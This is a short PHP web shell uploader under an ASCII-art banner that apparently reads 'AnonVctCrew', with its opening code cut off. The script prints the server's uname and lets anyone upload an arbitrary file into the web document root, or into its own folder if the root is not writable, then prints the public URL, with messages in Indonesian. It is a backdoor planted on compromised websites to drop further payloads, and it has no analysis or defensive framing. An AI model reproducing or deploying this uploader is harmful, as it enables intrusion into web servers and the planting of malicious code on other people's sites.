_____                      _   _         _   ___                         
(  _  )                    ( ) ( )       ( )_(  _`\                       
| (_) | ___     _     ___  | | | |   ___ | ,_) ( (_) _ __  __   _   _   _ 
|  _  /' _ `\ /'_`\ /' _ `\| | | | /'___)| | | |  _ ( '__)'__`\( ) ( ) ( )
| | | | ( ) |( (_) )| ( ) || \_/ |( (___ | |_| (_( )| | (  ___/| \_/ \_/ |
(_) (_|_) (_)`\___/'(_) (_)`\___/'`\____)`\__|____/'(_) `\____)`\___x___/'
                                                                          
                                                                          
	
".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['AnonVctCrew_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['AnonVctCrew_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "upload root sukses-> $web/$files"; } else { echo "gagal upload root >:("; } } else { if(@copy($_FILES['AnonVctCrew_file']['tmp_name'], $files)) { echo "upload sukses!! $files di folder ini"; } else { echo "upload gagal!!"; } } } ?>